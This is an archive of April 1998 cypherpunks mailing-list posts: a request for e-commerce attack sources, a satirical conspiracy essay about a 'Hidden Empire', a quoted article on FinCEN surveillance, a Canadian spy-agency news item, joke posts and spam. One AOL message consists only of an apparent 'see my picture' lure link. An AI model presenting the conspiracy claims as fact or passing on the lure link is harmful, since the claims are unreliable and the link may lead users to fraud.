Message-ID: <Pine.SUN.3.95.980417015534.26276A-100000@minotaur.uwimona.edu.jm>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know where I can find a compilation of E-Commerce attacks ?

Any sites on conpromising EC would be a plus ..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CJ Parker" <sonofgomez@hotmail.com>
Date: Fri, 17 Apr 1998 07:32:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Prologue 18 - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <19980417143132.17239.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com

Prologue 18 - SPACE ALIENS HIDE MY DRUGS !!!

"Everything is becoming science fiction.
 From the margins of an almost invisible literature
 has sprung the intact reality of  the 20th century."
~ J.G. Ballard ~

Hidden Empire:

Peter Jennings, Canadian Circle of Eunuchs Journalist, recently pointed out, on 'World News Tonight,' that the "rewards" of "labor saving" modern technology seem to be mysteriously "missing."
Jennings pointed out that the normal American working family now has 'two' individuals working a '47-hour week.'

Interestingly, Jennings managed to work into the story an example of the $3 Billion that the US government has laying around to invest in digging vast expanses of underground tunnels, etc., in New Mexico, for the purported purpose of (unsuccessfully) seeking out a suitable place to deposit nuclear waste. (He made no direct reference to Underground Reptilian Nazis.)

In the same evening news program, the CoE initiate aired a report containing a subliminal InfoWar reminder to US citizens as to their true role in the government's scheme of things, with a parody of the primitive primary products of Peristroika-TAXES, TAX PROMOTION and TAX ENFORCEMENT.
It described the implementation of the new (to Russia) income tax system, and showed promotional advertisements on the Pavlovian Broadcasting System (PBS) meant to ingrain in the minds of the citizens the officially correct way to view their new friend, Mr. Tax.
"Depressed? Pay your taxes, and you'll feel better."
"No appetite? Pay your taxes, and you'll feel better."
And, for the benefit of those who still know a poisoned Carrot when they see one, Russian PBS also carries promotional advertisements that blatantly and unashamedly trumpet the dark, underlying theme of Tax Agencies around the world, and which American taxpayers can easily recognize from their own experience:
"THE TAX ENFORCERS HAVE GUNS, AND THEY KNOW HOW TO USE THEM."
(Accompanied by live footage of armed thugs in camouflage subduing and kicking the crap out of scumbag tax resisters.)


Isn't it funny how Life imitates Real Life (tm)?




Maybe It's Under The Bed:

So where, exactly, are the mountains of cash resulting from the much ballyhoo'ed Benefits of Modern Technology (tm)?

In an age where it takes two individuals, working harder and longer than the former solitary 'bread earner,' to struggle (and fail) to maintain the same standard of living and future security that existed at a time when the infrastructures around them were undergoing building and expansion, as opposed to their current fall into decay, where are the "missing" benefits of technology disappearing to?

Question: "Where did the 'money go' that was earned by the workers in the proverbial Company Town (tm)?"
Answer: "Where it *always* goes...into deep pockets of the Empire...in this case, the Company Empire and the pockets of the company owner."

Major Question: "Could it possibly be that the Benefits of Modern Technology are being surreptitiously slipped into the pockets of a Hidden Empire (tm), which serves as an invisible version of a Global Company Town?"
Major Answer: "Those who do not learn from the past, are doomed to repeat it..."


How I Would Build A Hidden Empire:  (by Human Gus-Peter)
  [Disclaimer: I am just a kid with an overactive imagination, but...]

   If I wanted to steal all of the financial benefits of modern technology, I would take advantage of all the things I learned subliminally by ignoring the official version of history that my teachers were promoting while concentrating my conscious attention on making my spitballs stick to the ceiling and impressing the cute girl sitting behind me.

   I would first have my secret agent guys become the bosses of the people who sell Geritol  and make fun of their husband's Cuban accent on TV.  I would have them begin selling The Way Things Are (tm) by controlling the entertainment and news that people got to see.
   People have always resigned themselves to TWTA.  It used to be Kings who held their attention with swords and Priests who held their attention with hellfire, but now it is TV that holds their attention with Pavlovian hypnosis.

   Next, I would have my secret guys begin putting the financial benefits of modern technology into the pockets of those who were a part of my Hidden Empire, since people can't miss what they never have.
   I would make sure that my people controlled the money supply and could let people mostly maintain their standard of living, even while raising their taxes and creating all sorts of BlackHoles for new money to disappear down, such as bloated Defense budgets and social programs where it could be funneled into the pockets of my Hidden Empire.

  When the taxes, regulatory fees, licensing fees, interest charges, users fees, and the mountain of other money sources I was able to make The Way Things Are had grown so large that people started recognizing the resemblance to Company Town, Indentured Slavery, and the like, then I would begin making things so that they would receive fewer services and less benefit for the same amount of work.
   I would do it slowly, so that more people working longer hours for slowly declining services and benefits would gradually and constantly become the new, improved Way Things Are.

   I would make sure that those making the laws and those engaged in business benefited greatly from supporting the aims and maintenance of my Hidden Empire, and suffered greatly if they opposed or resisted it in any way.
   I would use my power to control The Way Things Are to direct anger, resentment and resistance of the people toward the government and corporate symbols schills of my Hidden Empire, and keep them from revolting against The Way Things Are by giving them the illusion of being able to control and change The Way Things Are by voting and making consumer decisions.  I would let them rearrange the pawns on my playing board while keeping The Game (tm) moving at a confusing enough pace so that they would hardly notice that the major pieces on my board always remain the same, no matter how they vote, or what illusory decisions they make in their role as consumers.

  Most importantly, I would cement the hold of my Hidden Empire on their lives by not only controlling the information that was fed to the masses, but also gaining access and controlling all of the information that they fed to my shills, and to each other.
   I would cause them to receive a mark in their right hand, or their forehead, which would identify them when they worked, banked, got a drivers license, bought dog food with their discount card at the supermarket.
   I would put in place an extensive surveillance network that could monitor their movements when they ate at a fast food restaurant, used a long-distance cash card, rented a Ryder truck, parked near a federal building, traveled without a license plate on their vehicle. (And if they ordered a Kentucky Fried Chicken 'snack pak' for their final meal, I would make sure it was delivered with an 'extra leg.'-hee, hee)

  I would make certain that the minions of my Hidden Empire could intercept and monitor all forms of communication on a global basis, and provide me with the information I needed to make, break and manipulate every individual, group, company and government on the face of the earth.  I would call one part of this operation 'Echelon' and another part of it 'Octopuss.'

   Lastly, I would use my power to monitor and control all communications to increase the range and power of my Hidden Empire by keeping a sufficient number of people just comfortable and secure enough to express approval of The Way Things Are (tm) in polls designed to find out how much more I can steal from them for the coffers of my Hidden Empire (tm) without mounting a revolution.
   As long as my shills could use their power to sexually assault women in the highest of government offices, financially ruin corporations to steal their software, murder men, women, children and goat-herders at will, without the average person risking their comfort and security by attempting to make serious changes in The Way Things Are, then I would continue to have my shills slowly eat away all of their rights, freedoms and their liberty in every area of their life, all across the face of the earth, until I succeeded in creating a Global The Way Things Are that would finally become resigned to their subjugation that I would no longer have to hide my Empire, and could openly give it an official name.
   I kind of like "New World Order..."  



Quit Being Silly:
[Note from the Editor: Believe it or not, Human Gus-Peter wrote the above without having read any of the following (and he's just a kid...):]


To: e$@vmeng.com
From: Robert Hettinga <rah@shipwright.com>
Subject: e$: Tet in Cypherspace

Actually, LBJ would have caused stagflation doing that "we owe it to
ourselves" stuff anyway, but it's a nice pipe dream. Nonetheless, money is
always much more important than "policy". In spite of the most bloodthirsty
actions of the most totalitarian statist -- say, the late Pol Pot -- it's
money that creates law, and not the other way around.

This presidency, more than any other in the history of this nation -- a
nation where political corruption has been celebrated as fine art --
understands this simple fact as a natural course of doing its lucretive
business. And the irony that the most socialist president in American
history is also the most attuned to income has never been lost on the people
he's trying to tax and regulate out of business.

However, Freidrich Hayek has been proven right once again where the Clintons
have been concerned, though it's hard to figure out sometimes if Billary are
outright totalitarians themselves or just Hayak's "useful idiots" in the
now-dead cause of socialism. Fortunately, like any good parasites, Billary
can't kill their host, as this latest "spinglage" on cryptography seems to
show. That need for a market "host" for socialism to suck blood from, in the
end, is what has saved our freedom again.



Subject: fincen propaganda
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
To: cypherpunks@cyberpass.net

------- Forwarded Message
From: "Mark A. Smith" <msmith01@flash.net>
> FinCEN: Financial Crimes Enforcement Network
> http://TeamInfinity.com/~ralph/FinCEN.html
> 
> Big Brother Wants to Look Into Your Bank Account (Any Time It Pleases)
> 
> The US government is constructing a system to track all financial
> transactions in real-time - ostensibly to catch drug traffickers,
> terrorists, and financial criminals. Does that leave you with the warm
> fuzzies - or scare you out of your wits?
> By Anthony L. Kimery

> Launched with a low-key champagne reception at the Treasury Department in
> April 1990, FinCEN is the US government's (perhaps the world's) most
> effective financial crime investigation unit. Even Russian President Boris
> Yeltsin asked for its help in locating stolen Communist Party funds. This
> state-of-the-art computer-snooping agency is quietly tucked away under the
> auspices of the Treasury Department. Its mission is to map the digital
> trails of dirty money, be it the laundered profits from drug sales, stolen
> S&L loot, hidden political slush funds, or the financing conduits of
> terrorists. It's the only federal unit devoted solely to the systematic
> collation and cross-analysis of law enforcement, intelligence, and public databases.

> Inside FinCEN's new digs on the second floor of a gleaming high-rise office
> building down the road from the CIA in Vienna, Virginia (otherwise known as
> "Spook City"), the talents of the IRS, FBI, DEA, Secret Service, and other
> traditional federal cops such as customs agents and postal inspectors are
> pooled. According to senior intelligence officers, these investigative units
> can access the resources of the CIA, the National Security Agency (which
> intercepts data on electronic currency movements into and out of the United
> States, some of which make their way into FinCEN's analyses), and the
> Defense Intelligence Agency.

> Bruh and other FinCEN officials openly acknowledge their association with
> the CIA, but they refuse to discuss further any aspect of FinCEN's dealings
> with it or any other intelligence agency. In addition to the CIA,
> intelligence officials have admitted, off the record, that the National
> Security Council and the State Department's Bureau of Intelligence and
> Research (INR) have also joined FinCEN's impressive intelligence crew. In
> short, FinCEN is a one-of-a-kind cauldron containing all the available
> financial intelligence in the United States.
> 
> "It's the first ever government-wide, multi-source intelligence and
> analytical network brought together under one roof to combat financial
> crimes," said Peter Djinis, director of the Treasury Department's Office of
> Financial Enforcement and one of the few Treasury officials close to FinCEN
> activities.

> As routine as such assignments as this case may be, the chumminess between
> FinCEN and the intelligence community raises serious questions about the
> privacy and security of the financial records of citizens John and Jane Doe,
> considering the intelligence community's historic penchant for illegal
> spying on non-criminals. Given the vast reach and ease with which the
> government can now tap into an individual's or business's financial records
> on a whim, these questions have received far too little scrutiny.

> But FinCEN has a hush-hush US$2.4 million contract with the US Department of
> Energy's Los Alamos National Laboratory to develop what Bruh and other
> FinCEN officials de-scribed as a powerful "money flow model." Unlike
> FinCEN's current system, Los Alamos's AI software will look for unexplained,
> atypical money flows. Coupled with a massively parallel computer system, the
> AI/MPP could perform real-time monitoring of the entire US electronic
> banking landscape.

> In the near future, all of these government databases will be interfaced by
> way of AI/ MPP technology. "MPP is critical to FinCEN's ability to analyze
> (banking) data to its full capacity," Bruh insists.
> 
> The pure power of such a "database of databases" terrifies critics. Though
> FinCEN and other authorities discount the potential for abuse, tell that to
> the CIA. Its charter forbids it from engaging in domestic surveillance;
> nonetheless, it spied on Americans for seven consecutive presidential
> administrations (it says it finally ceased its internal spying in the mid-
> 1970s).

> "The risk of the CIA getting its hands on this is serious - we know the kind
> of unscrupulous people who populate the spook world," said a Washington-area
> private investigator who conducts many legitimate financial investigations
> for a CIA-linked firm. "This kind of financial data, when coupled with other
> information like a person's credit history, could be used for blackmail,
> bribery, and extortion," said the investigator, who has a military
> intelligence background.
> 
> Bruce Hemmings is a veteran CIA clandestine-services officer who retired in
> 1989. Prior to the DTS proposal, he told Wired that the CIA routinely digs
> for financial dirt on people from whom the agency wants specific
> information.

> DTS could present an inviting mechanism for quieting unwanted dissent or for
> defanging an unruly congressional leader bent on exposing some questionable
> CIA operation. Although still in its embryonic stage and in spite of the
> looming privacy obstacle it will inevitably confront, FinCEN is seen by many
> in the government as the catalyst for a powerful, all- seeing, all-knowing,
> global, financial-tracking organization. In fact, FinCEN is al-ready working
> closely with INTERPOL, and Bruh's deputy just resigned to head up INTERPOL's
> US office.


Want To See Something REALLY Scary?
[Editors Note: Unfortunately the following is NOT fiction.]

> Seated at a computer terminal inside FinCEN's former command post, a FinCEN
> analyst began the hunt. He started by querying a database of business phone
> numbers. He scored a hit with the number of a local restaurant. Next he
> entered the Currency and Banking Database (CBDB), an IRS database accessed
> through the Currency and Banking Retrieval System. CBDB contains roughly 50
> million Currency Transaction Reports (CTRs), which document all financial
> transactions of more than US$10,000. By law these transactions must be filed
> by banks, S&Ls, credit unions, securities brokers, casinos, and other
> individuals and businesses engaged in the exchange of large sums of money.
> 
> The analyst narrowed his quest by searching for CTRs filed for transactions
> deemed "suspicious." Financial institutions must still file a CTR, or IRS
> Form 4789, if a transaction under US$10,000 is considered suspicious under
> the terms of an extensive federal government list. There was a hit. A series
> of "suspicious" CTRs existed in the restaurant's ZIP code. Punching up
> images of the identified CTRs on his terminal, the FinCEN analyst noted that
> the transactions were made by a person whose first name was John. The CTRs
> were suspicious all right; they were submitted for a series of transactions
> each in the amount of US$9,500, just below the CTR threshold of US$10,000.
> This was hard evidence that John structured the deposits to avoid filinga
> Form 4789, and that is a federal crime.
> 
> Selecting one of the CTRs for "an expanded review," the analyst got John's
> full name, Social Security number, date of birth, home address, driver
> license number, and other vital statistics, including bank account numbers.
> 
> Plunging back into the IRS database, the analyst broadened his search for
> all CTRs filed on behalf of the suspect, including non-suspicious CTRs. Only
> 20 reports deemed suspicious popped up on the screen, but more than 150 CTRs
> [brought to you by:ralph@TeamInfinity.com http://TeamInfinity.com/urls.html]
> were filed in all. A review of the non-suspicious ones revealed that on
> several, John listed his occupation as the owner or manager of the
> restaurant identified by the telephone number on the slip of paper taken
> from the arrested drug dealer. The connection between the name and the phone
> number originally given to FinCEN was secured.
> 
> The FinCEN analyst then tapped commercial and government databases, and
> turned up business information on the restaurant showing that John had
> reported an expected annual revenue for his eatery of substantially less
> than the money he had been depositing, as indicated by the CTRs. Fishing in
> a database of local tax assessment records, the analyst discovered that John
> owned other properties and businesses. With the names of these other
> companies, the analyst went back into the CTR database and found that
> suspicious transaction reports were filed on several of them as well.


"When all you have is a gigantic schlong , everything looks like a citizen."
~ Human Gus-Peter ~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Fri, 17 Apr 1998 10:17:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Quebecois: CSE not spying on you (NSA does that, we trade..)
Message-ID: <3.0.5.32.19980417101801.007b9710@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



Full story at
http://www2.thestar.com/thestar/back_issues/ED19980406/news/980406NEW01d_NA-
SPY6.html	

OTTAWA - Canada's ultra-secret spy agency is not eavesdropping on the
private conversations of Canadian citizens, Quebec's former chief justice
says. <P>

 For the past 20 months, Claude Bisson has scrupulously monitored the
activities of the Communications Security Establishment (CSE), a
half-century-old agency that operates so clandestinely its very existence
was not even publicly acknowledged until 1983. <P>


 ``My mandate is to assure that the CSE is abiding by the Constitution and
after 20 months I can assert it is abiding by the law,'' Bisson,
commissioner of the CSE, said during his first interview since taking on
the task of reviewing the agency's activities in June, 1996. <P>

 ``There is no targeting of Canadians in general and Quebecers in
particular. I am satisfied and I can assure the Canadian people that CSE
abides by the law.'' 

------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

Clarke's Third Law: Any sufficiently advanced technology is
indistinguishable from magic.

	










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: my-yahoo@yahoo-inc.com
Date: Fri, 17 Apr 1998 12:23:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Registration confirmation - My Yahoo!
Message-ID: <199804171923.MAA16225@e2.my.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain


Your Yahoo ID is       cpunks
Your e-mail is            cypherpunks@toad.com

Please save this message for future reference.

This confirmation message is sent to all users when 
they create a new account with Yahoo. When users register for
a new account, we require them to provide an e-mail address.
This confirmation notice is then sent to that address.

If you DID NOT request this account, or would like to REMOVE 
it, use one of the following steps:

-Click the hyperlink below
-Cut and paste the following address into your browser:
http://edit.my.yahoo.com/config/remove_user?k=IXtKZHdyeXx0OI4heUpleGF%2bYjQ3fGRjfHd7IXVKT041TzM2NzU1IXNKeo4%3d
-Or, if you do not have a web browser please REPLY to 
this message, and include this ENTIRE EMAIL with 
REMOVE in the subject line.

Welcome to My Yahoo!...

You can return to My Yahoo! by going to
                http://my.yahoo.com/

You Yahoo! ID may be used to access any of the Yahoo! services
that request a Yahoo! ID, such as:

My Yahoo - http://my.yahoo.com
Yahoo Mail - http://mail.yahoo.com
Yahoo Chat - http://chat.yahoo.com
Yahoo Finance - http://quote.yahoo.com
Yahoo Classifieds - http://classifieds.yahoo.com
Yahoo Message Boards - http://messages.yahoo.com
Yahoo Pager - http://pager.yahoo.com
Yahoo Travel - http://travel.yahoo.com
Yahoo Games - http://play.yahoo.com
Netscape Guide by Yahoo - http://netscape.yahoo.com

For information on Yahoo! ID's, please see below...


------------------

Yahoo! Accounts - Top Frequently Asked Questions (FAQ)

Q. How is the Yahoo! ID stored?

A. It is stored as a "cookie" on your local computer.
This way, you only need to sign in once. If you upgrade 
your browser software, or change computers, you will
probably be asked for your Yahoo! ID.  Because we usually 
do not ask for a Yahoo! ID, many people forget their Yahoo! 
ID and/or password.  Save this e-mail message to remember 
your Yahoo! ID.

Q. What if I forget my password?

A. Every Sign in page has a link at the bottom in case you have 
problems signing in.  This link will lead you to form that you 
can use to have a new password assigned to you.  You will need 
to remember your Yahoo! ID, and we will ask for your birthdate 
(as you entered it when you registered).

Q. What if I forget my Yahoo! ID?

A. Every Sign in page has a link at the bottom in case you 
have problems signing in.  This link will lead you to a form 
that you can use to retrieve your Yahoo! ID.  You will need to 
provide us with your email address, birthdate and zip code, 
as you entered it when you registered (so that we can verify you)

Q. I'm sure I've typed the right Yahoo! ID/password, but I keep 
getting rejected. Why?

A. Follow the instructions on the "Forgot your password"
page. If you are positive your Yahoo! ID and password are
correct, there is a small possibility that the system
is temporarily down. You should try again after several
hours. If you are unable to sign in for 24 hours, chances
are your account information is not what you think it is.

Q. How do I know if I am signed in?

A. All personalized areas require a Yahoo! ID except Netscape 
Guide. You will be prompted for a Yahoo! ID and password whenever you
try to access the different areas above. If you are not prompted, 
you are already signed in.


Q. I use a shared computer, how do I sign out?

A. If you are using "public" computers, you should
always sign out to "clear" your Yahoo! ID and cookie from
the computer's hard drive. The bottom of most pages
contain a "Change User" or "Sign Out" button. If you 
do not see one, go to http://my.yahoo.com and use
the "Sign-Out" link at the top of the page.

Q. I've changed E-Mail providers, how do I update
   my information?

A. Go to http://my.yahoo.com and click on the
Account Information link at the top of the page.
The edit page will let you update your E-Mail address, 
and other personal information and preferences.

Q. How much is all this going to cost me?

A. Absolutely nothing. All Yahoo information is
paid for through advertising. 

Q. But I still have so many unanswered questions!

A. Try the help links and images located in the
specific customized area you are using. You can also
send E-mail to us using the feedback link at the bottom
of most pages.

Thank you for using Yahoo!

[192.233.133.248]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bubba ROM DOS <brd@dev.null>
Date: Fri, 17 Apr 1998 11:37:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CoE/AoD Notice! / [Fwd: A.Word.A.Day--cabal]
Message-ID: <3537A173.FD0@dev.null>
MIME-Version: 1.0
Content-Type: text/plain

Due to the recent murder of the L.M. Boyd sampler by the Dark Forces,
future confirmations of the existence of an InterNet-wide network of
secret Circle of Eunuchs initiates will be in the capable hands of
the Word.A.Day website.

In keeping with a long-standing tradition, and in order not to fry the
mental brain-neuron circuits of those who are not imbibing enough nectar
of the drunken SODs to run 220V through a 110V circuit without doing
irrepairable harm to the MeatSpace manifestation of their Eternity
SoulServer, the timing of the confirmations will continue to be of
a nature that those without the ability to mathematically calculate
time-zones, as well as those who need to suspect subterfuge on the
part of those disseminating the manuscripts of 'The True Story of the 
InterNet' *after* receiving the Word.A.Day emails, will be able to
ease the excessive resistance their mind has to the flow of the Tao
by constructing within their minds a conspiracy theory in this regard
that puts the conspiracy theories contained in the mad ramblings of
the Author to shame.

e.g. - Although, on the surface (and far below the surface, perhaps 
reaching to the core of the Earth), it might appear that 'Prologue 18'
of 'Space Aliens Hide My Drugs', containing references to an alleged
'Hidden Empire' secretly controlling MeatSpace Reality, was followed
minutes later by A.Word.A.Day email defining the word 'cabal,' it can
be easily surmised by those familiar with the operation of the Trei
Transponder that this might well be a clever manipulation of time and
space by those whose Virtual Clock is based on the same 2600 hour 
time-frame that allowed Graham (Cracker) (Captain) John (Parker) 
Buller (Shit) to appear to be auto-replying to the semi-mysterious
ASCII Art slams against Tim C. May, even though a thorough examination
of Canadian maps reveals that Edmonton, Alberta, does not really 
exist, and that GJB is actually a Newfie, desperately trying to hide
the fact that his true MeatSpace persona resides deep within the
bowels of Newfoundland's half-hour time zone, which is the laughingstock
of the Great White Snort.

Nonetheless, when the Atomic Clock strikes 9:02 a.m. on April 19, 1998,
(9:32 a.m. in Newfoundland), rest assured that it will set in motion a
chain of events which will lift the leg of the Army of Dog, resulting
in the cutting of a monumentous fart that will surprise and overwhelm
the government robots programmed to believe that they are about to 
be pissed on, and are wearing raincoats that will provide little 
protection against the biological warfare attack that is first cousin
to the product of the castor bean, and which decimates those who are
unprepared for the true nature of the attack on their senses, while
being 'good for the heart' of the madman launching the attack.

Unlike the Grateful Dead who die smiling as the result of a 'pussy 
fart,' the Targets of TRIN (TM) will go to their graves wishing that
they had been farsighted enough to have eyes to see and ears to hear
the Voice Barfing In The Wilderness (TM) which warned them of the
coming attack on the Virtual Physical Appendage that knows what evil
lurks in the hearts of men...


To: linguaphile@wordsmith.org
Subject: A.Word.A.Day--cabal
From: Wordsmith <wsmith@wordsmith.org>
Date: Thu, 16 Apr 1998 08:26:03 -0400

cabal (kuh-BAL) noun

   1. A conspiratorial group of plotters or intriguers:
      "Espionage is quite precisely it-a cabal of powerful men, working
      secretly" (Frank Conroy).

   2. A secret scheme or plot.

cabal intr.verb

   To form a cabal; conspire.

[French cabale, from Medieval Latin cabala.]

WORD HISTORY: The history of cabal reveals how a word can be transferred from
one sphere of activity to another while retaining only a tenuous connection
with its past. Ultimately from Hebrew but transmitted to English probably by
way of Medieval Latin and French, cabal is first recorded in English in 1616
in the sense "cabala." Cabala was the name for the Hebrew oral tradition
transmitted by Moses and also the name for a Jewish religious philosophy
based on an esoteric interpretation of the Hebrew Scriptures. The notion 
"esoteric" is central to the development of this word in English, for cabal,
probably following the sense development in French, came to mean "a 
tradition, special interpretation, or secret," "private intrigue" (first
recorded in 1646-1647), and "a small body of intriguers" (first recorded in
1660). It is probably not coincidental that cabal is found with these latter
meanings during the mid-17th century, that time of plots and counterplots by
Royalists and Parliamentarians. The word gained a false etymology when it was
noticed that the five most influential ministers of Charles II were named
Clifford, Arlington, Buckingham, Ashley, and Lauderdale.
 
   "What you are seeing happen though is rump groups of so-called wise men,
   former foreign policy advisers to both Democratic and Republican
   administrations are beginning to meet in little sort of cabals around
   town..."
   Congress Getting Its Hands in Foreign Policy,
   Morning Edition (NPR), 9 May 1994.
 
This week's theme: words with interesting histories.
 
...........................................................................
The only function of economic forecasting is to make astrology look 
respectable. -John Kenneth Galbraith
 
Switching ISP or employer, and need to change the address on the list?
Sign-off from the old address by sending a blank message with Subject
line as "unsubscribe" to wsmith@wordsmith.org.  Sign-up at the new address
by sending message with Subject line as "subscribe <Your Name Here>".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bubba ROM DOS <brd@dev.null>
Date: Fri, 17 Apr 1998 12:28:22 -0700 (PDT)
To: David Honig <honig@alum.mit.edu>
Subject: Re: Quebecois: CSE not spying on you (NSA does that, we trade..)
In-Reply-To: <3.0.5.32.19980417101801.007b9710@otc.net>
Message-ID: <3537A634.1764@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


David Honig wrote:
> 
> Full story at
> http://www2.thestar.com/thestar/back_issues/ED19980406/news/980406NEW01d_NA-
> SPY6.html
> 
> OTTAWA - Canada's ultra-secret spy agency is not eavesdropping on the
> private conversations of Canadian citizens, Quebec's former chief justice
> says. <P>

"The policy of the Intelligence Directorate of the CIA to provide Canada
with finished analyses costing millions of dollars--even though that got
little or no information in return--was generous, but it was based on
enlightened self-interest as much as anything.
"The theory was that if Canada had the same information as the United
States, it would adopt similar policies.
"That's precisely what happened and Canada remained a firm ally, causing
little or no trouble or concern for the United States."

~ 'Men In The Shadows / The RCMP Security Service' by John Sawatsky

Can you say 'Bum-Buddies'? Sure you can...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Violent Terrorist Mailing List <govsting@dev.null>
Date: Fri, 17 Apr 1998 13:49:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Welcome to the Violent Terrorists Mailing List
Message-ID: <3537C10F.76D5@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


Your Violent Terrorists ID is 'cpunks':
Your co-conspirator-email is cypherpunks@toad.com:

Please save this message for future evidence.

This confirmation message is sent to all users when 
they plot the violent overthrow of their government. 
When lusers conspire to overthrow their government, 
we require them to provide a valid search-warrant address.
We will soon be kicking down the doors of that address.

Thank you for conspiring to violently overthrow your 
government!

Jammit Reamhole & Uno B. Freeh, NOMO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JASPARKES <JASPARKES@aol.com>
Date: Fri, 17 Apr 1998 12:59:14 -0700 (PDT)
Subject: my email changed
Message-ID: <e498d816.3537b2b7@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: JASPARKES@aol.com
Subject: my email changed
From: JASPARKES <JASPARKES@aol.com>
Date: Fri, 17 Apr 1998 15:49:13 EDT
Organization: AOL (http://www.aol.com)

<a href="http://members.forfree.at/~k1ng/index.html">Click here to see my
picture</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rory@rory.rory
Date: Fri, 17 Apr 1998 00:58:14 -0700 (PDT)
To: rory@rory.rory
Subject: Best Looking Sites
Message-ID: <199804172348.QAA07208@medialand.com.tw>
MIME-Version: 1.0
Content-Type: text/plain



We design & maintain the Hottest & Best looking Web Sites in the World at dirt cheap prices.

- There are Millions of potential clients using the Internet
- Your Business could increase incredibly
- We use the Best tools to make your Site Known to Millions

Make Money Now - With a WEB SITE - you have Nothing to lose

For further information please go to:  webmaker@n2mail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mail@hk.super.net
Date: Fri, 17 Apr 1998 15:01:18 -0700 (PDT)
To: mail@hk.super.net
Subject: Self Defense Video for All Ages - Male or Female
Message-ID: <199804171399QAA52165@post.netaxis.com>
MIME-Version: 1.0
Content-Type: text/plain





Would you be able to defend yourself if attacked on the street???

Hello, my name is David Vece and most people couldn't answer that question 
with any confidence.With todays crime rate and drug abuse problem, it's a
question that everyone needs to ask themselves. 

Crime statistics from the Bureau of Justice state that:

     -25% of violent crimes occur at or near the victim's home
     -14% at school and 12% at commercial establishments (stores)
     -A woman is raped every 2 minutes in America
     -1 out of every 4 rapes takes place in a public area or a parking 
      garage.
     -23% reported being involved with a leisure activity at the 
      time they were victimized.
     -21% reported they were at work or traveling to or from work
      when the crime occurred.
 
As you can see, a violent crime can happen to anyone at any time regardless 
of where you live or work. These crimes consisted of assault, robbery, 
carjacking, rape and murder. Based on these statistics, it's almost 
guaranteed that you will be the victim of a violent crime at some point
in your life.

Will you react????

I've been studying the martial arts for fifteen years and have been an
instructor for thirteen of them. I've been fortunate enough to have studied 
under some of the best instructors in the country. I currently have a black
belt in Kenpo Karate and have studied Tae Kwan Do, Kung Fu and I am
currently studying Hapkido and ISFA Shootfighting. 

My video, "A Chance to Escape", will show you how to defend yourself against
the seven most common types of attacks on the street. I will show you 
self defense techniques that anyone from ages eight to eighty can learn 
and use to defend themselves. These techniques are quick and easy to learn 
and can be the difference between life or death if you are attacked on 
the street.
 
My video uses easy to understand terms for younger children. This video is 
a MUST for any college student (male or female). The techniques in this 
video are not only good for self defense but for building confidence when 
out in public. Senior citizens and middle age adults will gain the most 
benefit from this video. It will also give you helpful hints on how to 
carry packages and purses so they won't get taken, how to avoid looking 
like a victim, and how to use common objects as weapons to fend off 
even the most aggressive attacker. 

With so many self defense videos on the market, it is about time that 
there was one made for people who want one simple and effective so they 
can actually use the techniques within minutes of learning them. The best 
part is that you won't have to study karate for fifteen years in order
to do these techniques. Just a few short minutes and you will understand
how effective you can be. When it comes right down to it, you are your
own best judge as to whether you feel safe or not. My video will help you
to feel that you have an edge on anyone who may try to attack you.  

It's impossible to know when or where a violent crime will happen and
the last thing you want to be is the victim. This video gives you the 
chance you need to react and avoid becoming a victim. All you really
 need is " A Chance to Escape."

To order my video "A Chance to Escape" send check or money order in 
U.S. funds only for $19.95+($4.95 S/H) to:

               Escape Enterprises
               P.O. Box  1657
               Meriden, CT.  06451

         Sorry, no COD's .     Please allow 2-3 weeks for delivery.
                      
              Don't be a victim - Fight back





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mail@hk.super.net
Date: Fri, 17 Apr 1998 15:01:13 -0700 (PDT)
To: mail@hk.super.net
Subject: Self Defense Video for All Ages - Male or Female
Message-ID: <199804172267PAA2626@post.netaxis.com>
MIME-Version: 1.0
Content-Type: text/plain





Would you be able to defend yourself if attacked on the street???

Hello, my name is David Vece and most people couldn't answer that question 
with any confidence.With todays crime rate and drug abuse problem, it's a
question that everyone needs to ask themselves. 

Crime statistics from the Bureau of Justice state that:

     -25% of violent crimes occur at or near the victim's home
     -14% at school and 12% at commercial establishments (stores)
     -A woman is raped every 2 minutes in America
     -1 out of every 4 rapes takes place in a public area or a parking 
      garage.
     -23% reported being involved with a leisure activity at the 
      time they were victimized.
     -21% reported they were at work or traveling to or from work
      when the crime occurred.
 
As you can see, a violent crime can happen to anyone at any time regardless 
of where you live or work. These crimes consisted of assault, robbery, 
carjacking, rape and murder. Based on these statistics, it's almost 
guaranteed that you will be the victim of a violent crime at some point
in your life.

Will you react????

I've been studying the martial arts for fifteen years and have been an
instructor for thirteen of them. I've been fortunate enough to have studied 
under some of the best instructors in the country. I currently have a black
belt in Kenpo Karate and have studied Tae Kwan Do, Kung Fu and I am
currently studying Hapkido and ISFA Shootfighting. 

My video, "A Chance to Escape", will show you how to defend yourself against
the seven most common types of attacks on the street. I will show you 
self defense techniques that anyone from ages eight to eighty can learn 
and use to defend themselves. These techniques are quick and easy to learn 
